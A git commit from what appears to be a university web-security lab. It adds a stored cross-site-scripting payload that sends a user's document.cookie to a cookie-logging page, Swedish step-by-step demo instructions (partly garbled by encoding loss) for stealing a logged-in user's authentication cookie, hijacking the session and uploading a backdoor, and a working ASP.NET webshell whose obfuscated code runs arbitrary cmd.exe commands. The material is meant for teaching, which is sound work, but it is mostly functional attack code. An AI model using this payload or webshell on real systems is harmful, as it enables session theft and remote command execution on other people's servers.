lab 3
This commit is contained in:
schulze
1
lab3/cs_lab3/myWebApplication/Demo/Attack.txt
Normal file
1
lab3/cs_lab3/myWebApplication/Demo/Attack.txt
Normal file
@ -0,0 +1 @@
|
||||
%3cscript>document.write('%3cimg src="http://localhost:49834/WriteCookie.aspx?Cookie='%2bdocument.cookie%2b'">');%3c/script>
|
||||
20
lab3/cs_lab3/myWebApplication/Demo/Demoinstruktioner.txt
Normal file
20
lab3/cs_lab3/myWebApplication/Demo/Demoinstruktioner.txt
Normal file
@ -0,0 +1,20 @@
|
||||
Demoinstruktioner:
|
||||
|
||||
Firefox - browser f<>r angriparen, Chrome - browser f<>r anv<6E>ndaren
|
||||
|
||||
Angripare:
|
||||
Ett: G<> till f<>rstasidan p<> applikationen i Firefox, klicka p<> Feedback.
|
||||
Tv<EFBFBD>: Klista in koden fr<66>n filen Attack.txt i kommentarsf<73>ltet.
|
||||
|
||||
Vanlig anv<6E>ndare:
|
||||
Tre: Logga in i applikationen.
|
||||
Fyra: G<> till Visa feedback och n<>r sidan visas kommer autentiseringskakan att skickas och
|
||||
l<>ggas i C:\tmp\cookie.txt
|
||||
|
||||
Angripare:
|
||||
Fem: G<> till C:\tmp\cookie.txt och kopiera inneh<65>llet
|
||||
Sex: <20>ppna cookie manager. Skapa en ny kaka med namn = auth och v<>rde = v<>rdet fr<66>n cookie.txt
|
||||
Sju: G<> till Default.aspx med den nya kakan installerad.
|
||||
<EFBFBD>tta: G<> till fileupload, ladda upp backdoor.aspx
|
||||
Nio: Surfa till localhost...backdoor.aspx
|
||||
Tio: K<>r n<>got kommando
|
||||
47
lab3/cs_lab3/myWebApplication/Demo/backdoor.aspx
Normal file
47
lab3/cs_lab3/myWebApplication/Demo/backdoor.aspx
Normal file
@ -0,0 +1,47 @@
|
||||
<%@ Page Language="C#" Debug="true" Trace="false" %>
|
||||
<%@ Import Namespace="System.Diagnostics" %>
|
||||
<%@ Import Namespace="System.IO" %>
|
||||
<script Language="c#" runat="server">
|
||||
void Page_Load(object sender, EventArgs e)
|
||||
{
|
||||
}
|
||||
string doRunCmd(string arg)
|
||||
{
|
||||
ProcessStartInfo psi = new ProcessStartInfo();
|
||||
psi.FileName = "c";
|
||||
psi.FileName += "m";
|
||||
psi.FileName += "d";
|
||||
psi.FileName += ".";
|
||||
psi.FileName += "e";
|
||||
psi.FileName += "x";
|
||||
psi.FileName += "e";
|
||||
psi.Arguments = "/";
|
||||
psi.Arguments += "c";
|
||||
psi.Arguments += arg;
|
||||
psi.RedirectStandardOutput = (2 + 3 == 5);
|
||||
psi.UseShellExecute = (1 + 2 == 4);
|
||||
Process p = Process.Start(psi);
|
||||
StreamReader stmrdr = p.StandardOutput;
|
||||
string s = stmrdr.ReadToEnd();
|
||||
stmrdr.Close();
|
||||
return s;
|
||||
}
|
||||
void cmdrun_Click(object sender, System.EventArgs e)
|
||||
{
|
||||
Response.Write("<pre>");
|
||||
Response.Write(Server.HtmlEncode(doRunCmd(txtArg.Text)));
|
||||
Response.Write("</pre>");
|
||||
}
|
||||
</script>
|
||||
<HTML>
|
||||
<HEAD>
|
||||
<title>asp.net webshell</title>
|
||||
</HEAD>
|
||||
<body >
|
||||
<form id="cmd" method="post" runat="server">
|
||||
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
|
||||
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="Execute" OnClick="cmdrun_Click"></asp:Button>
|
||||
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
|
||||
</form>
|
||||
</body>
|
||||
</HTML>
|
||||
Reference in New Issue
Block a user